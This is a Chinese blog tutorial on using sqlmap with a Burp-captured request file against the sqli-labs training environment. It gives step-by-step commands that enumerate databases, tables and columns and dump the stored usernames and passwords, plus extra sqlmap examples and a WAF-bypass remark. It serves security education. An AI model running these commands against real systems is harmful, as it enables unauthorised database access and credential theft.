(sqlmap)【sqli-labs11-20】爆破本地数据文件

目录

一、简介:

二、利用过程:

2.1、第一步:代理抓包

2.2、第二步:保存文件

2.3、第三步:爆破数据库

爆数据库

爆表名

爆字段名

爆数据


 推荐:

(手工)【sqli-labs11-12】POST注入:基本步骤、示例https://blog.youkuaiyun.com/qq_53079406/article/details/125655261?spm=1001.2014.3001.5501

一、简介:

使用bp+代理将抓住的包保存到本地文件进行跑



二、利用过程:

2.1、第一步:代理抓包

浏览器设置代理使用bp抓包

2.2、第二步:保存文件

使用BURP保存数据包到本地,命名为1.txt

 

 

2.3、第三步:爆破数据库

爆数据库

python sqlmap.py -r ’C:\Users\*****\Desktop\1.txt‘(文件保存的位置) --technique UE --dbms mysql --batch --dbs

 


爆表名

python sqlmap.py -r 'C:\Users\*****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security --tables


爆字段名

python sqlmap.py -r 'C:\Users\*****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security -T users --columns

 


爆数据

python sqlmap.py -r 'C:\Users\****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security -T users -C 'username,password' --dump

### 使用 `sqlmap` 进行 Sqli-Labs 测试 #### 基础命令介绍 为了有效地利用 `sqlmap` 对 SQL 注入漏洞进行测试,理解其基本命令至关重要。例如,在启动针对 sqli-labs 的攻击之前,可以通过指定目标 URL 来初始化扫描过程[^4]。 ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" ``` 此命令会尝试检测并利用给定URL中的任何潜在SQL注入点。 #### 自动化批量处理选项 当希望减少交互次数时,可以加入 `--batch` 参数来自动确认所有提示,默认选择第一个选项继续执行任务而不需人工干预[^1]。 ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch ``` 这使得连续通过多个关卡变得更加高效便捷。 #### 数据库枚举操作 对于想要获取数据库结构信息的情况,比如列出可用的数据库名称,则可以在原有基础上追加 `-dbs` 参数: ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs ``` 该指令不仅能够识别是否存在可被利用的SQL注入缺陷,还能进一步探索背后隐藏的数据存储情况[^2]。 #### 高级配置与优化设置 有时可能遇到更复杂的场景,这时就需要借助额外的功能参数来进行定制化的渗透测试工作。例如,指明特定类型的数据库管理系统(`--dbms`)以及采用何种技术手段(`--technique`)实施攻击;同时启用优化模式(-o),加快整个流程的速度[^3]: ```bash python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" --dbms mysql --technique B -o -D security --tables --batch ``` 上述例子展示了如何精确控制 `sqlmap` 行为以适应不同环境下的需求。 #### 应对Web应用防火墙(WAF) 面对某些部署了 WAF 的 web 应用程序,可能会发现常规方法难以奏效。此时应考虑调整策略或增加其他绕过机制。不过,在许多情况下,简单的重复调用仍能成功突破防护措施[^5]。 ```bash sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch --dbs ``` 以上就是使用 `sqlmap` 工具配合 sqli-labs 平台开展安全研究的一些常见实践方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值